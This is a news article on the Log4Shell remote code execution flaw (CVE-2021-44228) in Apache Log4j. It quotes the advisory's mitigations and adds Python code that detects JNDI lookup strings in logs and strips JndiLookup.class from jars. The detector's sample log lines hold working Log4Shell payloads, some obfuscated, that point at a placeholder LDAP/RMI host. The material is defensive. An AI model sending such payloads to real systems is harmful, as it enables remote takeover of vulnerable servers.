Researchers discover Critical RCE 0-day “Log4Shell” vulnerability (CVE-2021-44228) in Apache Log4j logging utility (update)

Researchers have discovered a Critical 0-day vulnerability (CVE-2021-44228) in the Apache Log4j logging utility that can result in remote code execution (RCE) simply by logging a specially crafted string. CISA and Microsoft have since issued new guidance for remediating the vulnerability (see the update below).

A cyber attacker could exploit this vulnerability to take control of an affected system.

The RCE vulnerability CVE-2021-44228 is caused by the JNDI lookup feature in Apache Log4j 2, which does not protect against attacker-controlled LDAP and other JNDI endpoints: a JNDI lookup string embedded in user-supplied input that gets logged is resolved by the library and can load code from a remote server. The vulnerability is rated Critical (base CVSS score of 10.0) and affects versions 2.0-beta9 through 2.14.1.

Apache described the vulnerability in a recent security update for log4j version 2.15.0 that addresses the threat:

“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”

Apache Software Foundation
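
The message lookup substitution Apache describes is what makes the bug detectable in logs: the payload has to reach the logger as text. The following is an added example, not code from Apache, LunaSec or this article, and it goes a little beyond the plain `${jndi:...}` case. Because Log4j resolves nested `${...}` lookups inside-out before it examines the `jndi:` prefix, a naive search for the literal `${jndi:` misses payloads that assemble the prefix from `${lower:j}`, `${upper:...}` or default-value `${nosuchkey:-j}` lookups; the script folds those the way Log4j's substitutor would and then pulls out the JNDI scheme and target. The access-log lines and the 203.0.113.0/24 addresses are constructed sample data.

```python
"""Added example: detect Log4Shell (CVE-2021-44228) lookup strings in log lines.

Log4j resolves nested ${...} lookups inside-out before the "jndi:" prefix is
examined, so a plain search for "${jndi:" misses payloads that assemble the
prefix from ${lower:j}, ${upper:J} or default-value ${nosuchkey:-j} lookups.
normalize() folds those the way Log4j's substitutor would, then scan_line()
extracts the JNDI scheme and target for blocking or IOC extraction.
"""
import re

# Innermost lookup only: a body that itself contains "${" is resolved on a later round.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalization: ${jndi:<scheme>:<target>}
JNDI_FULL = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:([^}]*)\}", re.I)
# Truncated or otherwise unparsable, but still unmistakably a JNDI lookup.
JNDI_ANY = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _resolve(match):
    """Fold one innermost lookup the way the attacker relies on Log4j folding it."""
    body = match.group(1)
    prefix = body.split(":", 1)[0].strip().lower()
    if prefix == "jndi":
        return match.group(0)                 # keep the JNDI lookup intact for matching
    if ":-" in body:
        return body.split(":-", 1)[1]         # ${key:-default} with an unresolvable key
    if prefix in ("lower", "upper"):
        arg = body.split(":", 1)[1]
        return arg.lower() if prefix == "lower" else arg.upper()
    return match.group(0)                     # ${env:X}, ${date:X}, ...: leave alone


def normalize(text, max_rounds=32):
    """Repeatedly fold innermost lookups until nothing changes (bounded rounds)."""
    for _ in range(max_rounds):
        folded = INNER_LOOKUP.sub(_resolve, text)
        if folded == text:
            break
        text = folded
    return text


def scan_line(line):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    norm = normalize(line)
    full = JNDI_FULL.search(norm)
    if full:
        return {"scheme": full.group(1).lower(), "target": full.group(2).strip(),
                "normalized": norm, "raw": line}
    if JNDI_ANY.search(norm):
        return {"scheme": None, "target": None, "normalized": norm, "raw": line}
    return None


def scan_log(lines):
    """Scan an iterable of log lines; findings carry the 1-based line number."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        hit = scan_line(line)
        if hit:
            hit["line_no"] = line_no
            findings.append(hit)
    return findings


# Constructed access-log lines (sample data, not a real capture); 203.0.113.0/24 is
# the documentation range, standing in for an attacker's LDAP/RMI listener.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] '
    '"GET /?q=${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.10/a} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.10:1099/a}"',
    '10.0.0.11 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${env:HOME} ${date:yyyy}"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {f['line_no']}: scheme={f['scheme']} target={f['target']}")
```

Run against the sample, lines 2 to 4 are flagged (two `ldap`, one `rmi`), while line 5 is not: it carries `${env:...}` and `${date:...}` lookups, which are noisy in some applications but are not the JNDI pattern this CVE is about. The folding is deliberately limited to the lookups attackers use for obfuscation (`lower`, `upper` and the `:-` default); anything else is left as-is so the normalized string still shows what the logger would have seen.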

Apache also gave details of the mitigation in the log4j 2.15.0 update, as well as workarounds for systems that cannot be patched right away.

“In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class,” Apache added.
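
Of the two workarounds, removing `JndiLookup.class` is the one that does not depend on a runtime flag being picked up, and it is the only option before 2.10. The following is an added example, not from the Apache advisory or this article, that does in Python what the quoted `zip -q -d` command does from the shell: it locates `JndiLookup.class` in a jar (including jars nested inside a WAR, which is where fat deployments hide log4j-core), reads the bundled version from Maven's `pom.properties`, maps that version to the advisory's guidance, and rewrites the jar without the class. The archives it builds for the demo are placeholders with the right entry names, not real Log4j bytecode.

```python
"""Added example: find log4j-core archives that still ship JndiLookup.class,
report the bundled version, and remove the class (the Python equivalent of the
advisory's `zip -q -d log4j-core-*.jar org/.../JndiLookup.class`)."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def _version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). The pre-release tag is
    dropped, which is enough to place a version relative to 2.10 and 2.15."""
    return tuple(int(p) for p in re.findall(r"\d+", version.split("-")[0]))


def mitigation_for(version):
    """Map a log4j-core version to the advisory's guidance for CVE-2021-44228."""
    v = _version_tuple(version)
    if v < (2,):
        return "log4j 1.x: not affected by CVE-2021-44228 (this CVE is specific to Log4j 2 lookups)"
    if v >= (2, 15):
        return "not affected: message lookups are disabled by default from 2.15.0"
    if v >= (2, 10):
        return ("set log4j2.formatMsgNoLookups=true (or LOG4J_FORMAT_MSG_NO_LOOKUPS=true), "
                "or remove JndiLookup.class from the jar")
    return "remove JndiLookup.class from the jar (the property switch does not exist before 2.10)"


def log4j_core_version(zf):
    """Version string from the Maven pom.properties that log4j-core ships, or None."""
    if POM_PROPS not in zf.namelist():
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def find_jndi_lookup(source, label):
    """Return [(location, version)] for every archive under `source` that contains
    JndiLookup.class. Recurses into nested .jar/.war/.ear entries; nested hits are
    labelled 'outer!inner'. `source` is a path or a file-like object."""
    found = []
    with zipfile.ZipFile(source) as zf:
        names = zf.namelist()
        if JNDI_CLASS in names:
            found.append((label, log4j_core_version(zf)))
        for name in names:
            if name.lower().endswith((".jar", ".war", ".ear")):
                found.extend(find_jndi_lookup(io.BytesIO(zf.read(name)), f"{label}!{name}"))
    return found


def strip_jndi_lookup(jar_path):
    """Rewrite jar_path without JndiLookup.class; return True if it was removed.
    Only the top-level archive is rewritten: a log4j-core nested inside a WAR has
    to be unpacked, stripped, and repacked (or the WAR rebuilt)."""
    tmp = jar_path + ".tmp"
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))   # keeps per-entry metadata
    os.replace(tmp, jar_path)
    return removed


def build_sample_jar(path, version):
    """Constructed stand-in for log4j-core: placeholder bytes, not real bytecode;
    only the entry names and pom.properties matter for the check."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Build a placeholder jar and a WAR embedding it, scan both, strip the
    top-level jar, and re-scan. Returns the scan results as plain data."""
    with tempfile.TemporaryDirectory() as d:
        jar = os.path.join(d, "log4j-core-2.10.0.jar")
        war = os.path.join(d, "app.war")
        build_sample_jar(jar, "2.10.0")
        with open(jar, "rb") as fh, zipfile.ZipFile(war, "w") as wz:
            wz.writestr("WEB-INF/lib/log4j-core-2.10.0.jar", fh.read())
        result = {
            "jar_before": find_jndi_lookup(jar, "log4j-core-2.10.0.jar"),
            "war": find_jndi_lookup(war, "app.war"),
            "removed": strip_jndi_lookup(jar),
        }
        result["jar_after"] = find_jndi_lookup(jar, "log4j-core-2.10.0.jar")
        return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
    for v in ("2.0-beta9", "2.10.0", "2.14.1", "2.15.0"):
        print(f"{v}: {mitigation_for(v)}")
```

Restart the JVM after stripping: the class is already loaded in a running process, and the file edit only takes effect on the next start. Verify the fix the same way you found the problem, by re-running the finder over the jar (or the WAR) rather than trusting the return value of the strip alone.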

Moreover, researchers from LunaSec, who dubbed the vulnerability "Log4Shell," have warned that it is easy to exploit and is already being exploited in the wild.

“Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.”

LunaSec also warned that "many, many services are vulnerable to this exploit," naming Steam and Apple's cloud services as well as Minecraft and applications built on Apache Struts. They added that similar vulnerabilities have been exploited before, such as the Apache Struts flaw behind the 2017 Equifax data breach.

Finally, proof-of-concept (PoC) exploit code for CVE-2021-44228 has also been published to GitHub.

Update December 15, 2021:

The Cybersecurity and Infrastructure Security Agency (CISA) has created a new webpage, Apache Log4j Vulnerability Guidance, as well as a community-sourced GitHub repository, to help organizations remediate the log4j vulnerability.

Microsoft also updated its blog post on December 15 with additional information on ransomware attacks against Minecraft servers not hosted by Microsoft, as well as updated product guidance, including for Threat and Vulnerability Management.

Previously, Microsoft had warned that nation-state actors and access brokers linked to ransomware groups were exploiting the log4j vulnerability.
